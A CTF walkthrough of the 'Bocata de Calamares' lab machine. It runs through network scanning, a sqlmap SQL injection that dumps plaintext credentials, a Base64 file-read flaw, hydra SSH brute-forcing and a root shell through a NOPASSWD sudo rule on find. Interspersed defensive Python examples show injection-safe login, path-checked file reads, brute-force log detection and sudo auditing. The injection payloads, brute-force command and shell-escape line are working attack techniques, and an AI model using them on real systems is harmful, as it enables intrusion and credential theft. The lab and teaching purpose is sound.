TheHackersLabs - Bocata de Calamares Machine Walkthrough (WP)
城南花已开

Information Gathering

Service Discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.149 08:00:27:9c:0f:82 (Unknown)
192.168.60.254 00:50:56:f0:df:73 (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.952 seconds (131.15 hosts/sec). 4 responded
export ip=192.168.60.149
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Because guessing isn't hacking.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.149:22
Open 192.168.60.149:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-14 20:05 CST
Initiating ARP Ping Scan at 20:05
Scanning 192.168.60.149 [1 port]
Completed ARP Ping Scan at 20:05, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:05
Completed Parallel DNS resolution of 1 host. at 20:05, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:05
Scanning 192.168.60.149 [2 ports]
Discovered open port 80/tcp on 192.168.60.149
Discovered open port 22/tcp on 192.168.60.149
Completed SYN Stealth Scan at 20:05, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.60.149
Host is up, received arp-response (0.00054s latency).
Scanned at 2025-01-14 20:05:03 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:9C:0F:82 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Visit port 80 in the browser.

Only the SQL injection section of the page carries an actual article; everything else is just anchor links.

My guess: getting the user flag is tied to the SQL injection.

Directory scanning turns up the login page.

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,zip,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.149
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,html,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin.php (Status: 200) [Size: 359]
/admin.php (Status: 200) [Size: 359]
/images (Status: 301) [Size: 178] [--> http://192.168.60.149/images/]
/index.php (Status: 200) [Size: 4145]
/index.php (Status: 200) [Size: 4145]
/login.php (Status: 200) [Size: 2543]
Progress: 23670 / 23675 (99.98%)
===============================================================
Finished
===============================================================

Try the simplest SQL injection first, the universal-password (auth bypass) login.

There is a to-do list with a small hint: a user lee_archivos, Base64-encoded.

SQL Injection

At the same time, I used SQLMap to dump its data.

❯ sqlmap -u http://192.168.60.149/login.php --batch  --forms -D php -T usuarios --dump
___
__H__
___ ___[,]_____ ___ ___ {1.8.12#stable}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:17:22 /2025-01-14/

[20:17:22] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=6s6ccc6llee...ahfgivaj6t'). Do you want to use those [Y/n] Y
[20:17:22] [INFO] searching for forms
[1/1] Form:
POST http://192.168.60.149/login.php
POST data: alias=&password=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: alias=&password=] (Warning: blank fields detected): alias=&password=
do you want to fill blank fields with random values? [Y/n] Y
[20:17:22] [INFO] resuming back-end DBMS 'mysql'
[20:17:22] [INFO] using '/home/Pepster/.local/share/sqlmap/output/results-01142025_0817pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: alias (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: alias=-7116' OR 9008=9008#&password=etre

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: alias=GcxY' AND GTID_SUBSET(CONCAT(0x7176626a71,(SELECT (ELT(5595=5595,1))),0x71707a6a71),5595)-- hfGE&password=etre

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: alias=GcxY' AND (SELECT 7246 FROM (SELECT(SLEEP(5)))oZXp)-- FilJ&password=etre
---
do you want to exploit this SQL injection? [Y/n] Y
[20:17:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.24.0
back-end DBMS: MySQL >= 5.6
[20:17:22] [INFO] fetching columns for table 'usuarios' in database 'php'
[20:17:22] [INFO] retrieved: 'alias'
[20:17:22] [INFO] retrieved: 'varchar(20)'
[20:17:22] [INFO] retrieved: 'contraseña'
[20:17:22] [INFO] retrieved: 'varchar(16)'
[20:17:22] [INFO] retrieved: 'email'
[20:17:22] [INFO] retrieved: 'varchar(30)'
[20:17:22] [INFO] retrieved: 'id'
[20:17:22] [INFO] retrieved: 'int'
[20:17:22] [INFO] retrieved: 'nombre'
[20:17:22] [INFO] retrieved: 'varchar(20)'
[20:17:22] [INFO] fetching entries for table 'usuarios' in database 'php'
[20:17:22] [INFO] retrieved: '123456'
[20:17:22] [INFO] retrieved: 'adminPrinc'
[20:17:22] [INFO] retrieved: '[email protected]'
[20:17:22] [INFO] retrieved: '1'
[20:17:22] [INFO] retrieved: 'admin'
[20:17:22] [INFO] retrieved: 'qwertyuiop'
[20:17:22] [INFO] retrieved: 'Pep100'
[20:17:22] [INFO] retrieved: '[email protected]'
[20:17:22] [INFO] retrieved: '2'
[20:17:22] [INFO] retrieved: 'pepe'
[20:17:22] [INFO] retrieved: 'jaime'
[20:17:22] [INFO] retrieved: 'Jaime_P'
[20:17:22] [INFO] retrieved: '[email protected]'
[20:17:22] [INFO] retrieved: '3'
[20:17:22] [INFO] retrieved: 'jaime'
[20:17:22] [INFO] retrieved: 'qwertyu'
[20:17:22] [INFO] retrieved: 'Richard'
[20:17:22] [INFO] retrieved: '[email protected]'
[20:17:22] [INFO] retrieved: '4'
[20:17:22] [INFO] retrieved: 'Ricardo'
Database: php
Table: usuarios
[4 entries]
+----+------------+---------------------+---------+--------------+
| id | alias | email | nombre | contraseña |
+----+------------+---------------------+---------+--------------+
| 1 | adminPrinc | [email protected] | admin | 123456 |
| 2 | Pep100 | [email protected] | pepe | qwertyuiop |
| 3 | Jaime_P | [email protected] | jaime | jaime |
| 4 | Richard | [email protected] | Ricardo | qwertyu |
+----+------------+---------------------+---------+--------------+

[20:17:22] [INFO] table 'php.usuarios' dumped to CSV file '/home/Pepster/.local/share/sqlmap/output/192.168.60.149/dump/php/usuarios.csv'
[20:17:22] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/Pepster/.local/share/sqlmap/output/results-01142025_0817pm.csv'

[*] ending @ 20:17:22 /2025-01-14/

I tried every user here; there is nothing on the admin page.

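The login.php injection above works because the form fields are concatenated into the SQL text, and the dump shows the passwords are stored in plain text as well. As an added example (mine, not code from the writeup or the machine), here is that vulnerable pattern beside a parameterised version with salted hashes. SQLite stands in for MySQL, so the classic `' OR '1'='1` payload, which both engines accept, replaces the `#`-terminated payload sqlmap used; the rows are constructed sample data using the column names sqlmap recovered, with the column spelled `contrasena` to keep the identifier ASCII.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed sample rows in the layout of php.usuarios
# (id, alias, email, nombre, contraseña); values are made up.
USERS = [
    (1, "adminPrinc", "admin@example.invalid", "admin", "123456"),
    (2, "Pep100", "pepe@example.invalid", "pepe", "qwertyuiop"),
]

SCHEMA = ("CREATE TABLE usuarios (id INTEGER, alias TEXT, email TEXT, "
          "nombre TEXT, contrasena TEXT)")


def make_vulnerable_db():
    """Plaintext passwords, exactly as the dump shows the real table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany("INSERT INTO usuarios VALUES (?, ?, ?, ?, ?)", USERS)
    return conn


def login_vulnerable(conn, alias, password):
    """The login.php pattern: user input is pasted into the SQL text, so a
    quote in either field rewrites the WHERE clause."""
    query = (f"SELECT alias FROM usuarios WHERE alias = '{alias}' "
             f"AND contrasena = '{password}' ORDER BY id")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256, stored as 'salthex:digesthex'."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt.hex() + ":" + digest.hex()


def verify_password(stored, candidate):
    salt_hex, digest_hex = stored.split(":", 1)
    digest = hashlib.pbkdf2_hmac("sha256", candidate.encode(),
                                 bytes.fromhex(salt_hex), 100_000)
    # constant-time comparison: no timing leak on how many bytes matched
    return hmac.compare_digest(digest.hex(), digest_hex)


def make_hardened_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany(
        "INSERT INTO usuarios VALUES (?, ?, ?, ?, ?)",
        [(i, a, e, n, hash_password(p)) for i, a, e, n, p in USERS])
    return conn


def login_hardened(conn, alias, password):
    """Parameterised lookup: the driver sends alias as data, never as SQL,
    so quotes and comment markers in it are inert. The password is checked
    against the salted hash in code, not inside the WHERE clause."""
    row = conn.execute(
        "SELECT alias, contrasena FROM usuarios WHERE alias = ?",
        (alias,)).fetchone()
    if row is None or not verify_password(row[1], password):
        return None
    return row[0]


if __name__ == "__main__":
    bypass = "' OR '1'='1"
    print("vulnerable, bypass payload ->",
          login_vulnerable(make_vulnerable_db(), "nobody", bypass))
    print("hardened,   bypass payload ->",
          login_hardened(make_hardened_db(), "nobody", bypass))
```

The hardened version also removes the second weakness the dump exposed: even if a future injection leaks the table, the attacker gets PBKDF2 digests rather than reusable passwords.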
File Read

Try the user information obtained above.

echo  "lee_archivos" |base64
bGVlX2FyY2hpdm9zCg==

File read works; we obtain a user, superadministrator, and also tyuiop.

You can spot a comment quietly slipped in there:

Tengo que limitar los archivos que se pueden ver, al menos hasta que los usuarios tengan unas contraseñas más robustas -->

Si alguien leyera el archivo donde se encuentran los usuarios y usara la herramienta hydra para atacar nuestro servicio ssh… Bueno, mañana me encargare de ello

I have to limit which files can be viewed, at least until the users have stronger passwords.

If someone read the file containing the users and used the hydra tool to attack our SSH service... Well, I'll take care of that tomorrow.

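The admin page turns a Base64 parameter into a file to read without restricting where that file may be, which is exactly what the comment admits. As an added example (mine, not the machine's PHP), here is a Python version of such a handler that decodes the parameter, keeps the resolved path inside one document directory and serves only an allowlist of document types. The directory, file names and allowed suffixes are assumptions constructed in setup_demo(); the trailing newline that `echo | base64` adds is handled the same way the page's encoded value carries one.

```python
import base64
import binascii
import os
import tempfile

# Only plain documents may be served; PHP source, /etc files or the user
# list the comment worries about are refused regardless of path.
ALLOWED_SUFFIXES = (".txt", ".md")


def decode_name(param):
    """Turn the Base64 request parameter back into a file name, rejecting
    anything that is not valid Base64 or valid UTF-8."""
    try:
        name = base64.b64decode(param, validate=True).decode("utf-8")
    except (binascii.Error, ValueError):  # UnicodeDecodeError is a ValueError
        raise ValueError("parameter is not valid Base64/UTF-8")
    name = name.strip()  # 'echo | base64' leaves a trailing newline
    if not name:
        raise ValueError("empty file name")
    return name


def safe_read(base_dir, param):
    """Resolve the requested name inside base_dir and read it only if the
    real path is still inside base_dir and has an allowed suffix."""
    name = decode_name(param)
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name))
    # realpath collapses '..' and follows symlinks, so comparing resolved
    # paths catches both traversal and symlink escapes; an absolute name
    # makes os.path.join discard base, and the same check catches that.
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes the document directory")
    if not target.lower().endswith(ALLOWED_SUFFIXES):
        raise ValueError("file type not allowed")
    if not os.path.isfile(target):
        raise ValueError("no such file")
    with open(target, encoding="utf-8") as fh:
        return fh.read()


def try_read(base_dir, param):
    """The handler's decision as a value: (ok, content-or-reason)."""
    try:
        return True, safe_read(base_dir, param)
    except ValueError as exc:
        return False, str(exc)


def encode_name(name):
    return base64.b64encode(name.encode()).decode()


def setup_demo():
    """Constructed document directory: one readable note and one file that
    must never be served even though it sits inside the directory."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "notas.txt"), "w", encoding="utf-8") as fh:
        fh.write("constructed sample note\n")
    with open(os.path.join(d, "admin.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php /* constructed */ ?>\n")
    return d


if __name__ == "__main__":
    d = setup_demo()
    for req in ("notas.txt", "admin.php", "../../etc/passwd", "/etc/passwd"):
        print(req, "->", try_read(d, encode_name(req)))
    print("garbage ->", try_read(d, "not*base64"))
```

Encoding the parameter is not a control: Base64 hides the file name from a casual look but the server decodes it into a path anyway, so the checks have to happen on the decoded, resolved path.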
User Privilege Escalation

The hint was handed to us, so just brute-force it directly.

❯ hydra -l superadministrator -P /usr/share/wordlists/rockyou.txt ssh://$ip
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-14 20:44:18
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.60.149:22/
[22][ssh] host: 192.168.60.149 login: superadministrator password: princesa
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-14 20:44:58
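The comment on the admin page anticipated exactly this attack, and from the defender's side the artefact it leaves is sshd's auth log. As an added example (not part of this writeup), a small detector over constructed auth.log lines: it flags a source address with a burst of failed passwords inside a short window and raises the severity when a successful login from the same address follows, which is the hydra-then-ssh sequence above. The host name, PIDs and timestamps in the sample are made up, and the threshold and window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# OpenSSH auth.log lines for password authentication (syslog timestamp,
# host, process, result). Public-key logins use different wording and are
# deliberately ignored here.
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$")

# Constructed sample: six failures in three seconds, then a success from the
# same address; one stray typo from another host that must not be flagged.
SAMPLE_LOG = """\
Jan 14 20:44:20 bocata sshd[2101]: Failed password for superadministrator from 192.168.60.100 port 51230 ssh2
Jan 14 20:44:21 bocata sshd[2102]: Failed password for superadministrator from 192.168.60.100 port 51231 ssh2
Jan 14 20:44:21 bocata sshd[2103]: Failed password for superadministrator from 192.168.60.100 port 51232 ssh2
Jan 14 20:44:22 bocata sshd[2104]: Failed password for superadministrator from 192.168.60.100 port 51233 ssh2
Jan 14 20:44:22 bocata sshd[2105]: Failed password for superadministrator from 192.168.60.100 port 51234 ssh2
Jan 14 20:44:23 bocata sshd[2106]: Failed password for superadministrator from 192.168.60.100 port 51235 ssh2
Jan 14 20:44:58 bocata sshd[2150]: Accepted password for superadministrator from 192.168.60.100 port 51240 ssh2
Jan 14 20:45:10 bocata sshd[2160]: Failed password for invalid user pepe from 192.168.60.7 port 40001 ssh2
Jan 14 20:45:30 bocata sshd[2161]: Accepted publickey for pepe from 192.168.60.7 port 40002 ssh2: ED25519 SHA256:xyz
""".splitlines()


def parse_line(line, year=2025):
    """Return (timestamp, result, user, ip) or None for lines we don't care
    about. Syslog timestamps carry no year, so the caller supplies one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(lines, threshold=5, window_s=60, year=2025):
    """Flag source IPs with >= threshold failed passwords within window_s
    seconds; severity becomes 'high' when an accepted password login from
    that IP arrives while the burst is still inside the window."""
    events = [e for e in (parse_line(l, year) for l in lines) if e]
    events.sort(key=lambda e: e[0])
    fail_times = defaultdict(list)   # ip -> failure timestamps in window
    fail_users = defaultdict(set)    # ip -> user names tried
    findings = {}
    for ts, result, user, ip in events:
        window = [t for t in fail_times[ip]
                  if (ts - t).total_seconds() <= window_s]
        if result == "Failed":
            window.append(ts)
            fail_users[ip].add(user)
            if len(window) >= threshold:
                f = findings.setdefault(
                    ip, {"severity": "medium", "failures": 0, "success_user": None})
                f["failures"] = max(f["failures"], len(window))
        elif ip in findings and window:   # Accepted right after a flagged burst
            findings[ip]["severity"] = "high"
            findings[ip]["success_user"] = user
        fail_times[ip] = window
    for ip, f in findings.items():
        f["users"] = sorted(fail_users[ip])
    return findings


if __name__ == "__main__":
    for ip, f in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, f)
```

With hydra's default 16 parallel tasks the real log would show far more than six failures per second, so the threshold here is conservative; the "success after burst" rule is what separates a noisy scanner from a credential that actually worked.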

Connect over SSH and log in as the user.

❯ ssh superadministrator@$ip
The authenticity of host '192.168.60.149 (192.168.60.149)' can't be established.
ED25519 key fingerprint is SHA256:FGZRACBwhyqZdv6wvuqfoIz1l1eoneHbjQfxlQPQz0o.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? tes
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '192.168.60.149' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 24.04.1 LTS (GNU/Linux 6.8.0-51-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro

System information as of Tue Jan 14 12:44:58 PM UTC 2025

System load: 0.35 Processes: 180
Usage of /: 14.2% of 49.21GB Users logged in: 0
Memory usage: 8% IPv4 address for enp0s3: 192.168.60.149
Swap usage: 0%

* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.

https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

1 update can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


Last login: Fri Jan 10 17:42:22 2025 from 192.168.1.38
superadministrator@thehackerslabs-bocatacalamares:~$ id
uid=1001(superadministrator) gid=1001(superadministrator) groups=1001(superadministrator),100(users)
superadministrator@thehackerslabs-bocatacalamares:~$ ls
flag.txt recordatorio.txt
superadministrator@thehackerslabs-bocatacalamares:~$ cat flag.txt
c3VkbyAtbAo= # decodes to: sudo -l
superadministrator@thehackerslabs-bocatacalamares:~$ cat recordatorio.txt
Me han dicho que existe una pagina llamada gtfobins muy util para ctfs, la dejo aquí apuntada para recordarlo mas adelante.
superadministrator@thehackerslabs-bocatacalamares:~$ sudo -l
Matching Defaults entries for superadministrator on
thehackerslabs-bocatacalamares:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty

User superadministrator may run the following commands on
thehackerslabs-bocatacalamares:
(ALL) NOPASSWD: /usr/bin/find

Quite thoughtful: it even leaves a hint, beginner-friendly.

Me han dicho que existe una pagina llamada gtfobins muy util para ctfs, la dejo aquí apuntada para recordarlo mas adelante.

I was told there is a site called gtfobins that is very useful for CTFs; I'm noting it here so I remember it later.

Root Privilege Escalation

Privilege escalation through find does it.

superadministrator@thehackerslabs-bocatacalamares:~$ sudo find . -exec /bin/sh \; -quit
id
id
# uid=0(root) gid=0(root) groups=0(root)
# cd ~
# ls
root.txt
# cat root.txt
S0Y_UN_h4K3R
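The NOPASSWD rule on find is what makes the last step trivial, and it is the kind of rule an administrator should catch before a CTF player does. As an added example (mine, not from the writeup), an audit helper that parses `sudo -l` output and reports rules that need no password or grant a binary that GTFOBins, the site recordatorio.txt points at, documents as able to spawn a shell. The sample text is a constructed copy of the output above plus one made-up harmless rule, and the binary list is a small subset I chose; extend it from GTFOBins for real use.

```python
import os
import re

# Small subset of binaries GTFOBins lists as able to run a shell or write
# files when executed as root; the page's own rule grants one of them.
SHELL_ESCAPE_BINARIES = {
    "find", "vim", "vi", "less", "more", "awk", "python3", "perl", "env",
    "bash", "sh", "tar", "nmap",
}

# One rule line from `sudo -l`, e.g. "(ALL) NOPASSWD: /usr/bin/find"
RULE_RE = re.compile(
    r"^\((?P<runas>[^)]*)\)\s+(?:(?P<tags>(?:[A-Z]+:\s*)+))?(?P<cmds>.+)$")

# Constructed copy of the output above, plus a second made-up rule.
SAMPLE_SUDO_L = """\
Matching Defaults entries for superadministrator on
    thehackerslabs-bocatacalamares:
    env_reset, mail_badpass, use_pty

User superadministrator may run the following commands on
    thehackerslabs-bocatacalamares:
    (ALL) NOPASSWD: /usr/bin/find
    (root) /usr/bin/systemctl status nginx
"""


def parse_sudo_l(text):
    """Return the rule lines that follow 'may run the following commands',
    one dict per command (a rule may list several, comma-separated)."""
    rules = []
    in_rules = False
    for raw in text.splitlines():
        line = raw.strip()
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line or line.endswith(":"):
            continue  # blank lines and the trailing "host:" line
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = re.findall(r"[A-Z]+(?=:)", m["tags"] or "")
        for cmd in m["cmds"].split(","):
            cmd = cmd.strip()
            if cmd:
                rules.append({"runas": m["runas"], "tags": tags, "command": cmd})
    return rules


def audit_sudo_l(text):
    """Return the rules that deserve attention, each with its reasons."""
    findings = []
    for rule in parse_sudo_l(text):
        binary = os.path.basename(rule["command"].split()[0])
        reasons = []
        if "NOPASSWD" in rule["tags"]:
            reasons.append("no password required")
        if binary in SHELL_ESCAPE_BINARIES:
            reasons.append(f"{binary} can spawn a shell (see GTFOBins)")
        if rule["command"] == "ALL":
            reasons.append("unrestricted command")
        if reasons:
            findings.append({**rule, "binary": binary, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"({f['runas']}) {f['command']}: " + "; ".join(f["reasons"]))
```

Run against the machine's own output, the helper reports the find rule twice over: no password and a shell-capable binary. A rule that really needs find as root should be restricted to a fixed argument list, or replaced by a wrapper script that does the one job without `-exec`.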